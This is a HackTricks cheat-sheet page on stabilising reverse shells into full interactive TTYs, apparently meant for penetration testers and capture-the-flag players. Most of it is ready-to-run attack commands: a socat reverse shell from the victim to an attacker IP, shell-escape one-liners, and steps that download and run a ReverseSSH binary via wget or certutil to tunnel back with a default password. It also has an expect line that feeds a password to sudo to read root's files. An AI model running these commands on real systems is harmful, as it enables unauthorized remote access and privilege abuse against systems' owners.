Full TTYs

​☁️ HackTricks Cloud ☁️ -🐦 Twitter 🐦 - 🎙️ Twitch 🎙️ - 🎥 Youtube 🎥​
Do you work in a cybersecurity company? Do you want to see your company advertised in HackTricks? or do you want to have access to the latest version of the PEASS or download HackTricks in PDF? Check the SUBSCRIPTION PLANS!
Discover The PEASS Family, our collection of exclusive NFTs​
Get the official PEASS & HackTricks swag​
Join the 💬 Discord group or the telegram group or follow me on Twitter 🐦​@carlospolopm.
Share your hacking tricks by submitting PRs to the hacktricks repo and hacktricks-cloud repo.
Full TTY
Note that the shell you set in the SHELL variable must be listed inside /etc/shells or The value for the SHELL variable was not found in the /etc/shells file This incident has been reported. Also, note that the next snippets only work in bash. If you're in a zsh, change to a bash before obtaining the shell by running bash.
Python
python3 -c 'import pty; pty.spawn("/bin/bash")'
​
(inside the nc session) CTRL+Z;stty raw -echo; fg; ls; export SHELL=/bin/bash; export TERM=screen; stty rows 38 columns 116; reset;
You can get the number of rows and columns executing stty -a
script
script /dev/null -qc /bin/bash #/dev/null is to not store anything
(inside the nc session) CTRL+Z;stty raw -echo; fg; ls; export SHELL=/bin/bash; export TERM=screen; stty rows 38 columns 116; reset;
socat
#Listener:
socat file:`tty`,raw,echo=0 tcp-listen:4444
​
#Victim:
socat exec:'bash -li',pty,stderr,setsid,sigint,sane tcp:10.0.3.4:4444
Spawn shells
python -c 'import pty; pty.spawn("/bin/sh")'
echo os.system('/bin/bash')
/bin/sh -i
script -qc /bin/bash /dev/null
perl -e 'exec "/bin/sh";'
perl: exec "/bin/sh";
ruby: exec "/bin/sh"
lua: os.execute('/bin/sh')
IRB: exec "/bin/sh"
vi: :!bash
vi: :set shell=/bin/bash:shell
nmap: !sh
ReverseSSH
A convenient way for interactive shell access, as well as file transfers and port forwarding, is dropping the statically-linked ssh server ReverseSSH onto the target.
Below is an example for x86 with upx-compressed binaries. For other binaries, check releases page.
1.Prepare locally to catch the ssh port forwarding request:
# Drop it via your preferred way, e.g.
wget -q https://github.com/Fahrj/reverse-ssh/releases/latest/download/upx_reverse-sshx86 -O /dev/shm/reverse-ssh && chmod +x /dev/shm/reverse-ssh
​
/dev/shm/reverse-ssh -v -l -p 4444
(2a) Linux target:
# Drop it via your preferred way, e.g.
wget -q https://github.com/Fahrj/reverse-ssh/releases/latest/download/upx_reverse-sshx86 -O /dev/shm/reverse-ssh && chmod +x /dev/shm/reverse-ssh
​
/dev/shm/reverse-ssh -p 4444 [email protected]
(2b) Windows 10 target (for earlier versions, check project readme):
# Drop it via your preferred way, e.g.
certutil.exe -f -urlcache https://github.com/Fahrj/reverse-ssh/releases/latest/download/upx_reverse-sshx86.exe reverse-ssh.exe
​
reverse-ssh.exe -p 4444 [email protected]
If the ReverseSSH port forwarding request was successful, you should now be able to log in with the default password letmeinbrudipls in the context of the user running reverse-ssh(.exe):
# Interactive shell access
ssh -p 8888 127.0.0.1
​
# Bidirectional file transfer
sftp -P 8888 127.0.0.1
No TTY
If for some reason you cannot obtain a full TTY you still can interact with programs that expect user input. In the following example, the password is passed to sudo to read a file:
expect -c 'spawn sudo -S cat "/root/root.txt";expect "*password*";send "<THE_PASSWORD_OF_THE_USER>";send "\r\n";interact'
​☁️ HackTricks Cloud ☁️ -🐦 Twitter 🐦 - 🎙️ Twitch 🎙️ - 🎥 Youtube 🎥​
Do you work in a cybersecurity company? Do you want to see your company advertised in HackTricks? or do you want to have access to the latest version of the PEASS or download HackTricks in PDF? Check the SUBSCRIPTION PLANS!
Discover The PEASS Family, our collection of exclusive NFTs​
Get the official PEASS & HackTricks swag​
Join the 💬 Discord group or the telegram group or follow me on Twitter 🐦​@carlospolopm.
Share your hacking tricks by submitting PRs to the hacktricks repo and hacktricks-cloud repo.
Last modified 4mo ago